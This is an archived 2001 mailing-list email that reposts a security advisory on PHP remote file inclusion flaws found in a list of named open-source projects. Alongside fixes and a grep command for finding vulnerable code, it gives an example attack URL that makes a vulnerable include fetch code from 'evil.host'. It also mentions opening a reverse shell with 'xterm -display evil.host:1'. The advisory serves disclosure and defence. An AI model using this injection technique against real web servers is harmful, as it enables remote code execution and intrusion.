Return-Path: <sentto-279987-2638-1002079489-fc=all.net@returns.onelist.com> Delivered-To: fc@all.net Received: from 204.181.12.215 by localhost with POP3 (fetchmail-5.1.0) for fc@localhost (single-drop); Tue, 02 Oct 2001 20:27:13 -0700 (PDT) Received: (qmail 30564 invoked by uid 510); 3 Oct 2001 03:24:55 -0000 Received: from n21.groups.yahoo.com (216.115.96.71) by 204.181.12.215 with SMTP; 3 Oct 2001 03:24:55 -0000 X-eGroups-Return: sentto-279987-2638-1002079489-fc=all.net@returns.onelist.com Received: from [10.1.4.53] by n21.groups.yahoo.com with NNFMP; 03 Oct 2001 03:24:49 -0000 X-Sender: fc@big.all.net X-Apparently-To: iwar@onelist.com Received: (EGP: mail-7_4_1); 3 Oct 2001 03:24:49 -0000 Received: (qmail 62923 invoked from network); 3 Oct 2001 03:24:48 -0000 Received: from unknown (10.1.10.27) by l7.egroups.com with QMQP; 3 Oct 2001 03:24:48 -0000 Received: from unknown (HELO big.all.net) (65.0.156.78) by mta2 with SMTP; 3 Oct 2001 03:24:48 -0000 Received: (from fc@localhost) by big.all.net (8.9.3/8.7.3) id UAA10829 for iwar@onelist.com; Tue, 2 Oct 2001 20:24:48 -0700 Message-Id: <200110030324.UAA10829@big.all.net> To: iwar@onelist.com (Information Warfare Mailing List) Organization: I'm not allowed to say X-Mailer: don't even ask X-Mailer: ELM [version 2.5 PL1] From: Fred Cohen <fc@all.net> Mailing-List: list iwar@yahoogroups.com; contact iwar-owner@yahoogroups.com Delivered-To: mailing list iwar@yahoogroups.com Precedence: bulk List-Unsubscribe: <mailto:iwar-unsubscribe@yahoogroups.com> Date: Tue, 2 Oct 2001 20:24:48 -0700 (PDT) Reply-To: iwar@yahoogroups.com Subject: [iwar] [fc:results.of.semi-automatic.source.code.audit] Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Subject: results of semi-automatic source code audit /* * results of semi-automatic source code audit of a * majority of php based open-source projects registered * at Freshmeat.net or Sourceforge.net * * release date: 2001-10-02 * * authors: * atil <<a href="mailto:bugtraq@jakob.weite-welt.com?Subject=Re:%20results%20of%20semi-automatic%20source%20code%20audit%2526In-Reply-To=%2526lt;200110022159.f92Lx9K18556@genetics.ath.cx">bugtraq@jakob.weite-welt.com</a> * genetics <<a href="mailto:veenstra@chello.nl?Subject=Re:%20results%20of%20semi-automatic%20source%20code%20audit%2526In-Reply-To=%2526lt;200110022159.f92Lx9K18556@genetics.ath.cx">veenstra@chello.nl</a> * #yaht@ircnet, Yet Another Hacker Team */ --=[introduction]=-- php comes shipped with two features enabled by default that make unsuspicious looking source execute arbitrary code: - variables passed from the browser are stored in global context - file-system functions work transparent on URLs --=[background]=-- This exploits for php are not new and it's not the fault of php or any bug in the source of php itself but of the authors of a large number of projects written in php. What is new is the extensive audit of a huge amount of projects and the surprisingly large number of vulnerabilities discovered. --=[our task]=-- We looked for files often not directly accessed by the browser but included from somewhere else that contained something like this: in helperfunction.php : include("$includedir/library.php"); If the variable $includedir is not set by something executed before the include-statement, we can override it from the http-client with something like this: <a href="http://vuln.host/helperfunction.php?includedir=http://evil.host/code">http://vuln.host/helperfunction.php?includedir=http://evil.host/code> When the script is executed on vuln.host the php-interpreter will fetch the document http://evil.host/code/library.php and execute it. Breaking into the system is easy now because you can pass any php-source to the vulnerable system (download binaries, execute code, start reverse-shells (e.g. "xterm -display evil.host:1")...) that will be executed by the user running the web-server (mod_php) or by the owner of the virtual-host (CGI-interpreter). --=[solution]=-- php is not insecure by default, but makes insecure programming very easy. Here are some solutions to write safe php-code: - give included php-files a filename that is not executed by the web-server - put all included php-code outside the docroot (not possible for all users), use file permissions or .htaccess - use constants (best approach) in main.php: define("MAINFILE", true); define("CONFIGDIR", "/some/path/"); include('./some_function.inc'); in some_function.inc: if ( !defined("MAINFILE") ) die ("this is a include file!"); include(CONFIGDIR . "config.inc"); If you set global variables from the client, they don't interfere with constants; the defined-Test is not necessary for security. - use $HTTP_*_VARS and disable global variables from the client --=[scope]=-- Our audit searched only for vulnerabilities with include-files and can never be compared to a detailed analysis of a complete project. If your php-project didn't show up on the list below doesn't mean that you can relax now. We want to make people working on all this great php projects to become sensitive to the fact, that using modern scripting languages doesn't make your code safe by default. --=[hint for ISPs]=-- If you are an ISP and want to identify possible exploitable php code on your web-server use this: find -type f -a -name '*.php*' -print0 | xargs -0 grep -l -E '(include|require)(_once)? *\( *"?\$' The resulting files need further manual inspection... --=[vulnerable projects]=-- (all maintainers have been informed a while ago) Actionpoll http://sourceforge.net/projects/actionpoll AWOL http://www.freshmeat.net/projects/awol CCC http://www.cccsoftware.org DarkPortal http://sourceforge.net/projects/darkportal Empris http://empris.sourceforge.net Moregroupware http://www.moregroupware.org Phorecast http://phorecast.org Phormation http://www.peaceworks.ca/phormation.php pSlash http://www.pslash.com The Gallery http://sourceforge.net/projects/gallery webodex http://homepage.mac.com/ghorwood/webodex Zorbstats http://freshmeat.net/projects/zorbstats phpAdsNew http://sourceforge.net/projects/phpadsnew myphppagetool http://myphppagetool.sourceforge.net ActionPoll http://sourceforge.net/projects/actionpoll SIPS http://sips.sourceforge.net thatware http://thatware.org We don't provide the exact vulnerable pice of code but we secured our results with at least one machine (mostly the demo-site of the project) where we could execute a phpinfo()-script comming from our webserver. cheers atil & genetics ------------------ http://all.net/ Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/
This archive was generated by hypermail 2.1.2 : 2001-12-31 20:59:53 PST